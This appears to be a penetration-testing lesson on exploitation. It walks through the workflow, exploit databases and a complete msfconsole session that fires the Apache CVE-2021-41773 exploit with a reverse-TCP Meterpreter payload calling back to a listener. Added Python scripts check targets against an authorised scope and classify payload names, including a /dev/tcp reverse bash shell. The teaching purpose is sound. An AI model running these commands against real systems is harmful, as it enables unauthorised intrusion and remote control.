Exploitation is where theory meets practice — you take the vulnerabilities identified during scanning and enumeration and attempt to gain unauthorised access to demonstrate real-world impact. This lesson covers the Metasploit framework, exploit selection, payloads, shells, and post-exploitation basics.
Critical: Exploitation must only be performed on systems you have written authorisation to test. Accidentally exploiting out-of-scope systems can have legal consequences and cause real damage.
```
┌─────────────────────┐
│ 1. Identify         │
│ vulnerability       │
└──────────┬──────────┘
           ▼
┌─────────────────────┐
│ 2. Research exploit │
│ (CVE, PoC, etc.)    │
└──────────┬──────────┘
           ▼
┌─────────────────────┐
│ 3. Select/configure │
│ exploit + payload   │
└──────────┬──────────┘
           ▼
┌─────────────────────┐
│ 4. Execute exploit  │
│ (verify scope!)     │
└──────────┬──────────┘
           ▼
┌─────────────────────┐
│ 5. Establish access │
│ (shell/session)     │
└──────────┬──────────┘
           ▼
┌─────────────────────┐
│ 6. Document and     │
│ move to post-       │
│ exploitation        │
└─────────────────────┘
```
Before writing your own exploits, search existing databases:
| Resource | URL | Description |
|---|---|---|
| Exploit-DB | exploit-db.com | Curated archive of public exploits |
| CVE Details | cvedetails.com | CVE database with CVSS scores |
| NVD | nvd.nist.gov | National Vulnerability Database |
| Packet Storm | packetstormsecurity.com | Security tools and exploits |
| GitHub PoCs | github.com (search CVE-YYYY) | Proof-of-concept repositories |
```bash
# Search Exploit-DB from the command line (Kali)
searchsploit apache 2.4.49
searchsploit -m 50383   # mirror (download) an exploit into the current directory
```
Metasploit is the most widely used exploitation framework. It provides a structured approach to finding, configuring, and executing exploits.
| Metasploit module type | Purpose |
|---|---|
| Exploits | Code that triggers the vulnerability |
| Payloads | Code that runs after exploitation |
| Auxiliary | Scanners, fuzzers, brute-forcers |
| Post | Post-exploitation modules |
| Encoders | Obfuscate payloads to evade detection |
```
# Start the Metasploit console
msfconsole

# Search for an exploit
msf6 > search type:exploit apache
msf6 > search cve:2021-41773

# Select an exploit
msf6 > use exploit/multi/http/apache_normalize_path_rce

# View required options
msf6 exploit(...) > show options

# Set target and payload options
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > set RPORT 443
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444

# Select a payload
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp

# Run the exploit
msf6 exploit(...) > exploit
```
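Step 4 of the workflow says to verify scope before executing, and the Critical note above explains why. The script below is an added example, not part of this lesson and not Metasploit's own code: it parses an authorised-scope list, refuses any RHOSTS value that falls outside it or overlaps an exclusion, and only then writes the msfconsole commands from this lesson out as a resource script you can feed to `msfconsole -r`. The scope rules, the addresses and the `ScopeError` class are constructed for the example.

```python
"""Pre-flight scope gate before exploitation (added example, not from the lesson).

Reads an authorised-scope list, confirms every RHOSTS value is inside it and
clear of exclusions, and only then renders the msfconsole commands from the
lesson as a resource script for `msfconsole -r`. All addresses and the scope
rules below are constructed for the example.
"""
import ipaddress

# Constructed scope as it might appear in the rules of engagement.
# A leading "!" marks an explicit exclusion inside an otherwise allowed range.
SCOPE_RULES = [
    "192.168.1.0/24",
    "10.10.5.10-10.10.5.20",     # inclusive start-end range
    "!192.168.1.1",              # customer gateway: never touch
    "2001:db8:cafe::/64",
]


class ScopeError(ValueError):
    """Raised when an exploit would be pointed at an unauthorised host."""


def parse_scope(rules):
    """Return (allowed, excluded) as lists of ip_network objects.

    Accepts CIDR blocks, single addresses and inclusive start-end ranges."""
    allowed, excluded = [], []
    for raw in rules:
        rule = raw.split("#", 1)[0].strip()      # drop trailing comments from a file
        if not rule:
            continue
        bucket = allowed
        if rule.startswith("!"):
            bucket, rule = excluded, rule[1:].strip()
        if "-" in rule:
            first, last = (ipaddress.ip_address(p.strip()) for p in rule.split("-", 1))
            bucket.extend(ipaddress.summarize_address_range(first, last))
        else:
            bucket.append(ipaddress.ip_network(rule, strict=False))
    return allowed, excluded


def in_scope(target, allowed, excluded):
    """True only if the whole target (address or CIDR) sits inside an allowed
    block and touches no excluded block. Hostnames return False: resolve them
    and check the resulting addresses, since a name may point anywhere."""
    try:
        net = ipaddress.ip_network(target, strict=False)   # "1.2.3.4" becomes a /32
    except ValueError:
        return False
    if any(net.version == ex.version and net.overlaps(ex) for ex in excluded):
        return False
    return any(net.version == al.version and net.subnet_of(al) for al in allowed)


def check_targets(targets, rules):
    """Return the targets that are NOT authorised; an empty list means go."""
    allowed, excluded = parse_scope(rules)
    return [t for t in targets if not in_scope(t, allowed, excluded)]


def build_resource_script(module, options, payload):
    """Render the lesson's msfconsole steps as a resource script."""
    lines = [f"use {module}"]
    lines += [f"set {key} {value}" for key, value in options.items()]
    lines += [f"set PAYLOAD {payload}", "exploit"]
    return "\n".join(lines) + "\n"


def preflight(module, options, payload, rules):
    """Gate: refuse to produce a script if any RHOSTS entry is out of scope."""
    bad = check_targets(options["RHOSTS"].split(), rules)   # RHOSTS may list several hosts
    if bad:
        raise ScopeError("out-of-scope target(s): " + ", ".join(bad))
    return build_resource_script(module, options, payload)


if __name__ == "__main__":
    opts = {"RHOSTS": "192.168.1.100", "RPORT": "443",
            "LHOST": "192.168.1.50", "LPORT": "4444"}
    print(preflight("exploit/multi/http/apache_normalize_path_rce", opts,
                    "linux/x64/meterpreter/reverse_tcp", SCOPE_RULES), end="")
```

Run it as-is and it prints the resource script for the in-scope target; change RHOSTS to 192.168.1.1 (the excluded gateway) or to 192.168.1.0/25 (a block that contains it) and it refuses, because the whole target must be clean, not just most of it. Hostnames are rejected on purpose: resolve them first and check the resulting addresses.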
A payload is the code that executes on the target after successful exploitation.
| Type | Description | Example |
|---|---|---|
| Singles | Self-contained, all in one | linux/x64/exec |
| Stagers | Small initial payload that downloads the stage | windows/x64/meterpreter/reverse_tcp |
| Stages | Downloaded by stager, provides full functionality | Meterpreter, shell |
```
# List available payloads (inside a selected exploit, only compatible ones are listed)
msf6 > show payloads

# Filter by platform: msfconsole has no shell pipe, so use its built-in grep command
msf6 > grep windows/x64 show payloads
```
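The Singles/Stagers/Stages split is visible in the payload name itself: Metasploit writes a staged payload as `<stage>/<stager>` (windows/x64/meterpreter/reverse_tcp) and a stageless single as one segment (linux/x64/exec, or windows/x64/meterpreter_reverse_tcp with an underscore). The script below is an added example, not code from this lesson or from Metasploit: it parses a `show payloads`-style listing (constructed here), classifies each name, and filters by platform, architecture or kind, which is the same job as the grep above but on parsed fields. The stage, transport and architecture name sets are assumptions covering the common names, not the full catalogue.

```python
"""Classify Metasploit payload names by naming convention (added example, not
from the lesson). A staged payload is spelled <stage>/<stager>; a single
(stageless) payload is one self-contained segment. The listing below is
constructed to look like `show payloads` output; the stage, transport and
architecture name sets are assumptions, not the full catalogue.
"""
import re

# Constructed sample of `show payloads` output.
SAMPLE_LISTING = """\
   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  linux/x64/exec                                        normal  No     Linux Execute Command
   1  linux/x64/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter x64, Reverse TCP Stager
   2  linux/x64/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   3  windows/x64/meterpreter/reverse_tcp                   normal  No     Windows Meterpreter, Reverse TCP Stager
   4  windows/x64/shell_reverse_tcp                         normal  No     Windows x64 Command Shell, Reverse TCP Inline
   5  cmd/unix/reverse_bash                                 normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
"""

# Assumed vocabularies: stage components, stager transports and arch segments.
KNOWN_STAGES = {"meterpreter", "shell", "vncinject", "dllinject", "powershell", "upexec"}
TRANSPORTS = {"reverse_tcp", "bind_tcp", "reverse_http", "reverse_https", "reverse_tcp_rc4",
              "reverse_winhttp", "reverse_winhttps", "reverse_named_pipe", "bind_named_pipe",
              "reverse_tcp_uuid"}
ARCHES = {"x64", "x86", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc", "ppc64", "sparc"}

# A listing row: index, then a slash-separated payload name, then whitespace.
PAYLOAD_LINE = re.compile(r"^\s*\d+\s+(\S+/\S+)\s")


def classify(name):
    """Describe one payload name.

    kind == "staged": a small stager connects and pulls the stage over the
    connection (the stage/stager pair is the last two segments).
    kind == "single": everything is in the one payload; nothing is fetched."""
    parts = name.split("/")
    arch = parts[1] if len(parts) > 2 and parts[1] in ARCHES else None
    info = {"name": name, "kind": "single", "platform": parts[0], "arch": arch,
            "stage": None, "stager": None}
    if len(parts) >= 3 and parts[-2] in KNOWN_STAGES and parts[-1] in TRANSPORTS:
        info.update(kind="staged", stage=parts[-2], stager=parts[-1])
    return info


def parse_listing(text):
    """Pull payload names out of `show payloads`-style output, skipping headers."""
    matches = (PAYLOAD_LINE.match(line) for line in text.splitlines())
    return [m.group(1) for m in matches if m]


def filter_payloads(names, platform=None, arch=None, kind=None):
    """Filter like `grep windows/x64 show payloads`, but on parsed fields."""
    keep = []
    for name in names:
        info = classify(name)
        if platform and info["platform"] != platform:
            continue
        if arch and info["arch"] != arch:
            continue
        if kind and info["kind"] != kind:
            continue
        keep.append(name)
    return keep


if __name__ == "__main__":
    for name in parse_listing(SAMPLE_LISTING):
        info = classify(name)
        extra = (f" stage={info['stage']} stager={info['stager']}"
                 if info["kind"] == "staged" else "")
        print(f"{name:40} {info['kind']:7}{extra}")
```

The kind matters operationally: a staged payload needs the stage delivered over the connection after the stager calls back, so there is a second transfer to fail (or to be noticed by network monitoring), while a single carries everything in the initial payload at the cost of size.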